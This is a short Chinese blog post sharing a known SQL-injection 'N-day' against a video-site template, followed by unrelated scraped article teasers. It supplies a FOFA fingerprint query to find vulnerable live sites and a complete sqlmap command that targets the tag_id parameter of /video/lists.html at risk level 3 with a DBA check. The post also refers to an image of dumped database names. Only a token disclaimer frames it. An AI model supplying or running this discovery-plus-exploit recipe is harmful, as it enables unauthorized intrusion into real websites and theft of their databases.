首页 > 其他分享 >一个日h站的Nday

一个日h站的Nday

时间:2025-01-18 14:43:03浏览次数:1  
标签:sqlmap cid 一个 -- tag Nday id

0x00 前言

今天先来无事的我翻起了qq收藏夹。忽然发现了一个去年EDUSRC群里一个老表发的洞。今天就给大家发出来耍耍。
抵制黄色网站人人有责,打造绿色上网环境。
面对正规网站时候,请不要做非法测试!!!
废话就不多说了。

0x01正文

fofa语句

body="<script type=text/javascript src=/tpl/default/static/js/jquery-3.2.1.min.js></script>"

sqlmap语句

python sqlmap.py -u "http://URL/video/lists.html?orderCode=lastTime&tag_id=0&sub_cid=0&cid=0"  --technique B -p tag_id --risk 3 --random-agent --is-dba

下面贴个库名的图

标签:sqlmap,cid,一个,--,tag,Nday,id
From: https://www.cnblogs.com/cn-sec-/p/18678449

相关文章

  • Nginx proxy_pass 的一个注意点
    原文:Nginx中proxy_pass的作用以及注意事项格式proxy_pass格式:proxy_passURL。proxy_passhttp://www.xxx.com/;proxy_passhttp://192.168.200.101:8080/uri;proxy_passunix:/tmp/www.sock;注意假设Nginx服务器的域名为www.xxx.com,后端服务器为192.168.1.10。......
  • 一个基于 Roslyn 和 AvalonEdit 的跨平台 C# 编辑器
    前言今天大姚给大家分享一个基于Roslyn和AvalonEdit开源、轻量、跨平台的C#编辑器:RoslynPad。Roslyn介绍Roslyn是一个强大的.NET编译器实现,为C#和VisualBasic开发者提供了丰富的代码分析API。它不仅是一个编译工具,还是一个支持构建高级代码分析工具的平台。主要功能Ro......
  • 2025-01-18:施咒的最大总伤害。用go语言,一个魔法师掌握了多种不同的咒语,每个咒语对应一
    2025-01-18:施咒的最大总伤害。用go语言,一个魔法师掌握了多种不同的咒语,每个咒语对应一个伤害值,这些伤害值存储在数组power中,其中可能会有多个咒语具有相同的伤害值。使用某个特定伤害值为power[i]的咒语后,魔法师不能再使用伤害值为power[i]-2、power[i]-1、power[i]+1......
  • 2025-01-18:施咒的最大总伤害。用go语言,一个魔法师掌握了多种不同的咒语,每个咒语对应一
    2025-01-18:施咒的最大总伤害。用go语言,一个魔法师掌握了多种不同的咒语,每个咒语对应一个伤害值,这些伤害值存储在数组power中,其中可能会有多个咒语具有相同的伤害值。使用某个特定伤害值为power[i]的咒语后,魔法师不能再使用伤害值为power[i]-2、power[i]-1、power[......
  • 简单讲一下免杀的一个思想
    这几天一直在忙,没时间学新东西,也不知道写什么,正好今天有人跟我要免杀,cs二开的东西,这里就水一篇文章,带各位入门免杀,建立一个免杀思路。1、什么是免杀?首先各位需要了解一下,免杀的基本概念免杀,全称为反杀毒技术,用来使木马病毒程序逃过杀毒软件的检测免杀的学习成本是很高的,因......
  • 使用标签怎样对一个单词标志缩写呢?
    在前端开发中,要对一个单词进行缩写标记,通常可以使用HTML的<abbr>标签。这个标签用于表示一个缩写或首字母缩略词,并可以通过title属性来提供缩写的完整形式或解释。当用户将鼠标悬停在带有<abbr>标签的文本上时,浏览器会显示title属性中的值作为工具提示。以下是使用<abbr>标签标记......
  • cursor总是南辕北辙,一个招让它乖乖听你话!
    方法一:在文件夹下新建一个文本文件,命名为xxx.cursorrules,不加也可以像这样,cursor就会按照你的指令去执行了。方法2:下载cursorrule插件在插件市场搜索cursor就可以看到很多关于cursorrule的插件了,插件有很多cursorrules的指令模版,拿来就能直接用。我个人推介下载中文的插......
  • 阿里面试:5000qps访问一个500ms的接口,如何设计线程池的核心线程数、最大线程数? 需要多
    本文原文链接文章很长,且持续更新,建议收藏起来,慢慢读!疯狂创客圈总目录博客园版为您奉上珍贵的学习资源:免费赠送:《尼恩Java面试宝典》持续更新+史上最全+面试必备2000页+面试必备+大厂必备+涨薪必备免费赠送:《尼恩技术圣经+高并发系列PDF》,帮你实现技术自由,完......
  • 软件测试常用的7种方法,最后一个是升职加薪关键!
    一般而言,软件测试方法分为黑盒测试、白盒测试、灰盒测试、静态测试、动态测试、手动测试、自动化测试和探索性测试等类型。【1】黑盒测试黑盒测试又称功能测试、数据驱动测试或基于需求规格说明书的功能测试。该测试方法验证被测对象使用质量及外部质量表现。采用黑盒测试方法,测......
  • 创建一个CMake项目
    本文将演示如何使用CMake管理一个中等复杂度的项目,从创建项目到编译和运行的整个过程,涵盖了从基本配置到高级特性的实际应用。实战内容如下:创建CMakeLists.txt文件:定义项目、库、可执行文件和测试。编写源代码和测试:编写代码和测试文件。创建构建目录:保持源代码目录整......